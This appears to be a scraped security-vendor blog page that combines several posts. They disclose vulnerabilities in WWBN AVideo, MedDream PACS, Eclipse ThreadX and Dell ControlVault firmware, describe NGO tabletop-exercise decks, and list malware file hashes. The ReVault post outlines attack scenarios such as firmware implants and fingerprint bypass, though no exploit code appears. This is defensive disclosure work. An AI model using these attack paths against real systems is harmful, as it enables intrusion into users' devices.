Cisco Talos’ Vulnerability Discovery & Research team recently disclosed seven vulnerabilities in WWBN AVideo, four in MedDream, and one in an Eclipse ThreadX module. **Read more.**

**Talos Takes**

Hazel is joined by threat intelligence researcher James Nutland to discuss Cisco Talos’ latest findings on the newly emerged Chaos ransomware group. **Listen here.**

**Upcoming events where you can find Talos **

It’s the summer. We’ll be on the beach. 

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**   
MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507   
Typical Filename: VID001.exe   
Claimed Product: N/A   
Detection Name: Win.Worm.Coinminer::1201  

**SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**      
MD5: 7bdbd180c081fa63ca94f9c22c457376    
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details    
Typical Filename: IMG001.exe     
Detection Name: Simple\_Custom\_Detection 

**SHA 256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610**   
MD5: 85bbddc502f7b10871621fd460243fbc    
VirusTotal: https://www.virustotal.com/gui/file/41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610/details   
Typical Filename: N/A   
Claimed Product: Self-extracting archive   
Detection Name: Win.Worm.Bitmin-9847045-0 

**SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca**    
MD5: 71fea034b422e4a17ebb06022532fdde     
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details    
Typical Filename: VID001.exe     
Claimed Product: N/A     
Detection Name: Coinminer:MBT.26mw.in14.Talos  

**SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa**    
MD5: df11b3105df8d7c70e7b501e210e3cc3    
VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details    
Typical Filename: DOC001.exe    
Claimed Product: N/A    
Detection Name: Win.Worm.Coinminer::1201

AI wrote my code and all I got was this broken prototype

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed seven vulnerabilities in WWBN AVideo, four in MedDream, and one in an Eclipse ThreadX module.
The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy

Wednesday, August 6, 2025 08:00

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed seven vulnerabilities in WWBN AVideo, four in MedDream, and one in an Eclipse ThreadX module.

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

****WWBN XSS, race condition, incomplete blacklist vulnerabilities****

_Discovered by Claudio Bozzato of Cisco Talos._

WWBN AVideo is a video streaming platform with hosting, management, and video monetization features.

Talos found five cross-site scripting (XSS) vulnerabilities in WWBN AVideo 14.4 and dev master commit 8a8954ff:

*   TALOS-2025-2205 (CVE-2025-46410)
*   TALOS-2025-2206 (CVE-2025-53084)
*   TALOS-2025-2207 (CVE-2025-50128)
*   TALOS-2025-2208 (CVE-2025-36548)
*   TALOS-2025-2209 (CVE-2025-41420)

A specially crafted HTTP request can lead to arbitrary Javascript execution in all five cases. An attacker must get a user to visit a webpage to trigger these vulnerabilities.

Additionally, Talos identified two vulnerabilities that, when chained together, can lead to arbitrary code execution:

TALOS-2025-2212 (CVE-2025-25214) A race condition vulnerability exists in the aVideoEncoder.json.php unzip functionality of WWBN AVideo 14.4 and dev master commit 8a8954ff. A series of specially crafted HTTP requests can lead to arbitrary code execution.

TALOS-2025-2213 (CVE-2025-48732) An incomplete blacklist exists in the .htaccess sample of WWBN AVideo 14.4 and dev master commit 8a8954ff. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can request a .phar file to trigger this vulnerability.

****MedDream****

_Discovered by Emmanuel Tacheau and Marcin Noga of Cisco Talos._

MedDream PACS Premium is a DICOM 3.0 compliant picture archiving and communication system for the medical industry. The PACS server provides connectivity to all DICOM modalities (CR, DX, CT, MR, US, XA, etc.).

Talos found four unique MedDreams PACS Premium vulnerabilities.

TALOS-2025-2154 (CVE-2025-26469) is an incorrect default permissions vulnerability in the CServerSettings::SetRegistryValues functionality of MedDream PACS Premium 7.3.3.840. A specially crafted application can decrypt credentials stored in a configuration-related registry key. An attacker can execute a malicious script or application to exploit this vulnerability.

TALOS-2025-2156 (CVE-2025-27724) is a privilege escalation vulnerability in the login.php functionality of meddream MedDream PACS Premium 7.3.3.840. A specially crafted .php file can lead to elevated capabilities. An attacker can upload a malicious file to trigger this vulnerability.

TALOS-2025-2176 (CVE-2025-32731) is a reflected XSS vulnerability in the radiationDoseReport.php functionality of meddream MedDream PACS Premium 7.3.5.860. A specially crafted malicious URL can lead to arbitrary JavaScript code execution. An attacker can provide a crafted URL to trigger this vulnerability.

TALOS-2025-2177 (CVE-2025-24485) is a server-side request forgery (SSRF) vulnerability in the cecho.php functionality of MedDream PACS Premium 7.3.5.860. A specially crafted HTTP request can lead to SSRF. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.

****Eclipse ThreadX FileX integer underflow vulnerability****

_Discovered by Kelly Patterson of Cisco Talos._

Eclipse ThreadX is an embedded development suite for an advanced real-time operating system (RTOS) that provides efficient performance for resource-constrained devices. 

TALOS-2024-2088 is a buffer overflow vulnerability in the FileX RAM disk driver functionality of Eclipse ThreadX FileX git commit 1b85eb2. A specially crafted set of network packets can lead to code execution. An attacker can send a sequence of requests to trigger this vulnerability.

WWBN, MedDream, Eclipse vulnerabilities

Tuesday, August 5, 2025 09:00

*   Talos reported 5 vulnerabilities to Broadcom and Dell affecting both the ControlVault3 Firmware and its associated Windows APIs that we are calling “ReVault”. 
*   100+ models of Dell Laptops are affected by this vulnerability if left unpatched. 
*   The ReVault attack can be used as a post-compromise persistence technique that can remain even across Windows reinstalls.  
*   The ReVault attack can also be used as a physical compromise to bypass Windows Login and/or for any local user to gain Admin/System privileges. 

**Dell ControlVault overview **

Dell ControlVault is “a hardware-based security solution that provides a secure bank that stores your passwords, biometric templates, and security codes within the firmware.” A daughter board provides this functionality and performs these security features in firmware. Dell refers to the daughter board as a Unified Security Hub (USH), as it is used as a hub to run ControlVault (CV), connecting various security peripherals such as a fingerprint reader, smart card reader and NFC reader. 

Here is a photographic example of a USH board:  ​​​​

Picture of a USH Board running CV. 

This is the board in its natural environment:  

USH board (highlighted in orange) inside a Dell Latitude laptop. 

The current iterations of the product are called ControlVault3 and ControlVault3+. and can be found in more than 100 different models of actively-supported Dell laptops (see DSA-2025-053), mostly from the business-centric Lattitude and Precision series. These laptop models are widely used in the cybersecurity industry, government settings and challenging environments in their Rugged version. Sensitive industries that require heightened security when logging in (via smartcard or NFC) are more likely to find ControlVault devices in their environment, as they are necessary to enable these security features. 

**Findings **

Today, Talos is publishing five CVEs and their associated reports. The vulnerabilities include multiple out-of-bounds vulnerabilities (CVE-2025-24311, CVE-2025-25050) an arbitrary free (CVE-2025-25215) and a stack-overflow (CVE-2025-24922), all affecting the CV firmware. We also reported an unsafe-deserialization (CVE-2025-24919) that affects ControlVault’s Windows APIs. 

**Impact **

With a lack of common security mitigations and the combination of some of the vulnerabilities mentioned above, the impact of these findings is significant. Let’s highlight two of the most critical attack scenarios we have uncovered. 

**Post-compromise pivot **

On the Windows side, a non-administrative user can interact with the CV  firmware using its associated APIs and trigger an Arbitrary Code Execution on the CV firmware. From this vantage point, it becomes possible to leak key material essential to the security of the device, thus gaining the ability to permanently modify its firmware. This creates the risk of a so-called implant that could stay unnoticed in a laptop’s CV firmware and eventually be used as a pivot back onto the system in the case of a Threat Actor’s post-compromise strategy. The following video shows how a tampered CV firmware can be used to “hack Windows” by leveraging the unsafe deserialization bug mentioned previously. 

0:00

/0:22

**Physical attack **

A local attacker with physical access to a user’s laptop can pry it open and directly access the USH board over USB with a custom connector. From there, all the vulnerabilities described previously become in-scope for the attacker without requiring the ability to log-in into the system or knowing a full-disk encryption password. While chassis-intrusion can be detected, this is a feature that needs to be enabled beforehand to be effective at warning of a potential tampering. 

Another interesting consequence of this scenario is that if a system is configured to be unlocked with the user’s fingerprint, it is also possible to tamper with the CV firmware to accept any fingerprint rather than only allowing a legitimate user’s.   

0:00

/0:07

**Mitigation **

To mitigate these attacks, Talos recommends the following: 

*   Keep your system up to date to ensure the latest firmware is installed. CV firmware can be automatically deployed via Windows Update, but new firmware usually gets released on the Dell website a few weeks prior. 
*   If not using any of the security peripherals (fingerprint reader, smart card reader and NFC reader) it is possible to disable the CV services (using the Service Manager) and/or the CV device (via the Device Manager).  
*   It is also worth considering disabling fingerprint login when risks are heightened (e.g., leaving one’s laptop unattended in a hotel room). Windows also provides Enhanced Sign-in Security (ESS), which may help mitigate some of the physical attacks and detect inappropriate CV firmware. 

**Detection **

To detect an attack, consider the following: 

*   Depending on your laptop model, chassis intrusion detection can be enabled in the computer’s BIOS. This would flag physical tampering and may require entering a password to clear the alert and restart the computer. 
*   In the Windows logs, unexpected crashes of the Windows Biometric Service or the various Credential Vault services could be a sign of compromise. 
*   Cisco customers using Cisco Secure Endpoint can be made aware of potential risks with the signature definition “bcmbipdll.dll Loaded by Abnormal Process”. 

**Conclusion **

These findings highlight the importance of evaluating the security posture of all hardware components within your devices, not just the operating system or software. As Talos demonstrated, vulnerabilities in widely-used firmware such as Dell ControlVault can have far-reaching implications, potentially compromising even advanced security features like biometric authentication. Staying vigilant, patching your systems and proactively assessing risk are essential to safeguard your systems against evolving threats.

ReVault! When your SoC turns against you…

In 2023, Cisco Talos and partners created a special Backdoors & Breaches card deck to help NGOs improve their cybersecurity skills with practical, easy-to-use training tailored to their needs.

Monday, August 4, 2025 12:00

*   In 2023, Talos collaborated with NetHope and Cisco Crisis Response to create a customized Backdoors & Breaches expansion deck for international humanitarian organizations, addressing their unique cybersecurity challenges. 
*   The new expansion deck helps NGOs with constrained budgets improve proactive security and incident response skills through engaging tabletop exercises that are specific to their technical, political, and logistical challenges. 
*   Hundreds of expansion decks have been distributed to international NGOs, and Talos has received positive feedback for their practicality and relevance. 
*   Building on this success, we partnered with NGO-ISAC to develop a United States-specific deck for domestic NGOs, enhancing their cybersecurity preparedness.

**Humanitarian organizations and the cybersecurity landscape**

Hello friends! My name is Joe Marshall and I work at Cisco Talos as a cyber threat researcher and security strategist. Throughout my travels with Talos, I’ve met extraordinary individuals and organizations who fight injustices in a variety of ways: caring for children, feeding the unhoused, promoting democracy, protecting the environment, or resettling refugees who are fleeing from war. 

In moments of unimaginable crisis and pain, the international non-governmental organization (NGO) folks I met are on the front lines distributing aid, documenting human rights abuses, assisting first responders, and offering comfort to people who have had their worlds upended. I unabashedly admire and respect them. 

Unfortunately, international NGOs have historically struggled in cybersecurity. No matter an NGO’s size, limited donor and grant dollars mean that sustaining the organization competes with delivering aid, leaving little (if any) funding for cybersecurity. As a result, public sector offensive actors, mercenary spyware organizations, and state-sponsored actors take advantage of this to target or financially exploit these NGOs, even though they are assisting some of the most vulnerable people in the world. No one gets a pass in this modern era of cybercrime!

**Helping the helpers**

In 2023, the Cisco Crisis Response (CCR) team — a group that helps local agencies and communities prepare for, respond to, and sustainably rebuild from crises — approached my team at Talos with a rare opportunity to help incorporate cybersecurity into their work alongside their partner, NetHope.

NetHope is a humanitarian assistance organization that “helps our nonprofit Members effectively address the world’s most pressing challenges through collaboration, collective action and the smarter use of technology.” They also host the NetHope Global Summit, a yearly gathering of international NGOs to discuss technical issues and solutions to enable their member NGOs’ missions.

Before this project, I was not well-versed in the challenges of the NGO cybersecurity landscape or operating realities. Every business vertical is unique, and my first few meetings with NetHope forced me to confront the stark realities of the cybersecurity poverty line. With NGOs’ limited cybersecurity budgets, expertise, and resources, I knew our project had to have a low barrier to entry.

After much brainstorming, I suggested that we create an NGO-centric version of the popular cybersecurity tabletop exercise, “Backdoors & Breaches,” to keep workers’ incident response skills sharp.

**What is a tabletop exercise? **

A tabletop exercise (TTX) is a group thought experiment. The “Game Master” presents various scenarios and variables to their players, who are usually team leaders in their business, to see how they respond as a group. At a high level, TTXs are a way to help your team prepare for worst-case scenarios and cost-effectively develop plans and responses to a variety of incidents. As they say, “Fortune favors the prepared.”

For example, a hospital might want to conduct a TTX to develop and test incident response and data recovery if hackers were to attack their electronic health records. An electric utility company might conduct a TTX to test critical infrastructure restoration and coordination with emergency responders. And, of course, a humanitarian assistance organization may need to protect itself against cyber attacks to keep their life-saving work going!

**An introduction to Backdoors & Breaches**

Backdoors & Breaches is a card-based TTX developed and published under a GNU license by Black Hills Information Security. It’s a novel game designed to teach both technical and non-technical players cybersecurity incident response in a format similar to the popular Dungeons & Dragons roleplaying game. Here’s an example of gameplay at the RSA Conference, with the digital version of the game:

If you want to accommodate a specific technical aspect of security, like industrial control systems, the cloud, or threat hunting, you can modify Backdoors & Breaches with expansion decks. Customizing cards to reflect your team's unique circumstances can result in better buy-in and even a higher level of preparedness when a breach occurs.

**Talos and NetHope create a new expansion**

It was this potential customization that attracted me to making a new expansion deck for the international humanitarian community. The concept of Talos and NetHope adapting a cost-effective, portable, and easy-to-understand TTX to fit the limited cybersecurity budgets of typical NGOs was irresistible. To bring this vision to life, I assembled a diverse team of seasoned cybersecurity NGO professionals, technologists, and crisis response specialists who recognized the value in developing new cards.

The result was a new deck that seamlessly merged into the original Backdoors & Breaches game. These unique cards are modeled from real events and speak to the unique technical, political, and logistical challenges that humanitarian assistance organizations may face during cyber attacks. Here are some examples:

__Imagine that an angry mob raids your NGO’s office. You’re trying to do digital forensics, but your team is forced to leave the country! What do you do?__

We presented this new expansion at the NetHope Global Summit in 2023, where participants widely enjoyed it. We found that this expansion pack brought them together in ways the generic deck on its own likely wouldn’t have. Many people shared first-hand experiences with the stressful situations these cards presented, which led to authentic and open conversations on the best responses to the scenarios.

__Presenting the base deck and expansion pack at the 2023 NetHope Global Summit.__

Over the course of several summits, Talos and NetHope have given away hundreds of physical copies of the expansion, and we’ve received a lot of positive reception from the international NGO community. If you’re curious, you can also find the cards online here.

**The U.S. domestic NGO edition**

In a country as large as the United States, there are hundreds of domestic NGOs that operate solely within the country and local communities. The NGO Information Sharing and Analysis Center (NGO-ISAC) is a 501(c)(3) nonprofit organization that focuses on domestic civil society organizations.

Using the momentum of our Backdoors & Breaches international humanitarian expansion pack, Talos partnered with NGO-ISAC to create a new deck that reflects U.S.-specific NGO security situations.

__On-stage demonstration at the__ __Ford Foundation__ __for the NGO-ISAC Conference.__

If the NGO’s team is spread across the country and wants to play, that’s not a problem! Using this GitHub link you can instantiate and connect to a mini web server on your local computer. With a web sharing tool, you can stream it to any size audience and folks can play along virtually. You can easily use Python for this.

**Conclusion**

International and domestic NGOs are critical to aid delivery and civil society, but they’re heavily targeted by threat actors who seek to disrupt or exploit their missions. TTXs like Backdoors & Breaches lower the barrier to entry for organizations to have serious conversations about security posture and response, and NetHope and Talos’ custom expansions provide industry-specific scenarios to enrich the experience.

I feel very fortunate to have had the opportunity to volunteer and donate my time to help NGO workers and volunteers fight the good fight. Whether you’re a threat intelligence organization, an international NGO providing medical care to refugees, or a domestic food bank fighting hunger, Talos is with you.

Backdoors & Breaches: How Talos is helping humanitarian aid NGOs prepare for cyber attacks

This week Bill connects the hype of literary awards to cybersecurity conference season. We highlight key insights from the Q2 2025 IR Trends report, including phishing trends, new ransomware strains, and top targeted sectors. Finally, check out all the places Talos will be at Black Hat.

Thursday, July 31, 2025 14:00

Welcome to this week’s edition of the Threat Source newsletter.

This week the Booker Prize Longlist was released and it featured several books I’ve read this year a couple that are on my TBR (To Be Read), a couple that I had not heard of, and a couple that make me scratch my head and question why they would be included at all. It’s always exciting for me to see the Booker Longlist as it gives me an idea of how I’ve tapped into the literary fiction zeitgeist in first half of the year and what I may be tapping into in the back half of the year. That got me thinking about the cycle of staying up to date with the current threat landscape and the evolution of the threat actor behaviors and techniques and how Black Hat and DEF CON reside in a similar space for all of us in the cyber security space. Some of the new or interesting things that will come out will provide actionable insights, others will be a heaping serving of more of the same and while not trivial they will be super interesting and important, and finally some information will simply be all name and sizzle, but in the end full of sound and fury and signifying nothing.  

As a reader I’ve to understand that these lists, and the authors and books included in them, are there for various reasons and not all of them are on the merit of the narrative and the craft of writing. Early in my career it was hard to separate the things that came out of Summer Camp because I was so desperate to learn and so excited that I often couldn’t leverage my own experiences and separate the actionable from the detritus. Now I find that I don’t even have to expend much energy to move the firehose of information into the proper channels in my mind and then dive in and take what I’ve learned and apply it. Also trusting that if something that seems like empty sizzle is important – that I have team members that will keep me clued in and finding the needles in the never-ending field of haystacks.  

I hope you all have a tremendous time at Summer Camp, see a lot of old friends and make new ones and most importantly that you shower and use deodorant. Conference season is a marathon, it’s long, it’s arduous, it’s sweaty – be the hygienic change you want to see in the world.  

**The one big thing **

The Cisco Talos Incident Response Trends Q2 2025 report is out today, and as always it is packed with in-depth insights into recent attacker behavior. Phishing remains the top initial access vector, but interestingly, the objective of the majority of observed phishing attacks appeared to be credential harvesting, suggesting cybercriminals may consider brokering compromised credentials as simpler and more reliably profitable than other post-exploitation activities. Ransomware and pre-ransomware incidents made up half of all engagements this quarter, similar to last quarter. Talos IR observed Qilin and Medusa ransomware for the first time, while also responding to previously seen Chaos ransomware. Education was the most targeted industry vertical this quarter.

**Why do I care? **

The report contains details of how attackers are exploiting vulnerabilities and circumventing security tools. Examples include MFA installations with self-service options that allow attackers to register their own devices. We also saw stealthy tactics in ransomware attacks such as the use of PowerShell 1.0 (yes the original version from 2006) in what we’re calling “bring your own binary”.

**So now what? **

The report outlines actionable advice based on observed incidents,  
such as:

*   Proper configuration and monitoring of multi-factor authentication (MFA).
*   Importance of centralized logging
*   Steps to harden endpoint detection and response (EDR) systems.

These insights help prioritize mitigations that directly address real-world attack techniques. Download the report today.

**Top security headlines of the week ****Journalist Discovers Google Vulnerability That Allowed People to Disappear Specific Pages From Search**

By accident, journalist Jack Poulson discovered Google had completely de-listed two of his articles from its search results. “We only found it by complete coincidence,” Poulson told 404 Media. “I happened to be Googling for one of the articles, and even when I typed in the exact title in quotes it wouldn’t show up in search results anymore.” (404 media)

**ChatGPT, GenAI Tools Open to 'Man in the Prompt' Browser Attack**

A brand-new cyberattack vector allows threat actors to use a poisoned browser extension to inject malicious prompts into all of the top generative AI tools on the market, including ChatGPT, Gemini, and others. (DarkReading)

**Phishers Target Aviation Execs to Scam Customers**

KrebsOnSecurity recently heard from a reader whose boss’s email account got phished and was used to trick one of the company’s customers into sending a large payment to scammers. An investigation into the attacker’s infrastructure points to a long-running Nigerian cybercrime ring that is actively targeting established companies in the transportation and aviation industries (Krebs)

**Can’t get enough Talos? **

We have lots of videos to share, so queue them up and let’s get learning!

**Tales from the Frontlines**

Join the Cisco Talos Incident Response team to hear real-world stories from the frontlines of cyber defense. **Reserve your spot.**

**IR Trends Q2 2025**

Phishing attacks persist as actors leverage compromised valid accounts to enhance legitimacy. **Read more.**

**Beers with Talos**

So You Wanna Be an Incident Commander? Meet Alex Ryan. Bill, Joe and Hazel chat with Alex about what it really takes to lead through the chaos of a cybersecurity incident, from coordinating stressed-out teams, fielding exec questions, and making sure people eat. **Listen here.**

**Upcoming events where you can find Talos **

Join us at hacker summer camp! **Read our Black Hat preview here.**

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

**SHA 256: 83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08**  
MD5: 906282640ae3088481d19561c55025e4  
VirusTotal: https://www.virustotal.com/gui/file/83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08/details  
Typical Filename: AAct\_x64.exe  
Claimed Product: N/A  
Detection Name: PUA.Win.Tool.Winactivator::1201  

**SHA 256: 0581bd9f0e1a6979eb2b0e2fd93ed6c034036dadaee863ff2e46c168813fe442**  
MD5: 7854b00a94921b108f0aed00f77c7833  
VirusTotal: https://www.virustotal.com/gui/file/0581bd9f0e1a6979eb2b0e2fd93ed6c034036dadaee863ff2e46c168813fe442/details  
Typical Filename: winword.exe  
Claimed Product: Microsoft Word, Excel, Outlook, Visio, OneNote  
Detection Name: W32.0581BD9F0E.in12.Talos 

**SHA256: 2462569cf24a5a1e313390fa3c52ed05c7f36ef759c4c8f5194348deca022277**  
MD5: 42c016ce22ab7360fb7bc7def3a17b04   
VirusTotal: https://www.virustotal.com/gui/file/2462569cf24a5a1e313390fa3c52ed05c7f36ef759c4c8f5194348deca022277  
Typical Filename: Rainmeter-4.5.22.exe  
Detection Name: Artemis!Trojan    

**SHA 256:7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5**  
MD5: ff1b6bb151cf9f671c929a4cbdb64d86  
VirusTotal : https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5  
Typical Filename: endpoint.query   
Detection Name: W32.File.MalParent    

**SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Typical Filename: VID001.exe   
Detection Name: Win.Worm.Bitmin-9847045-0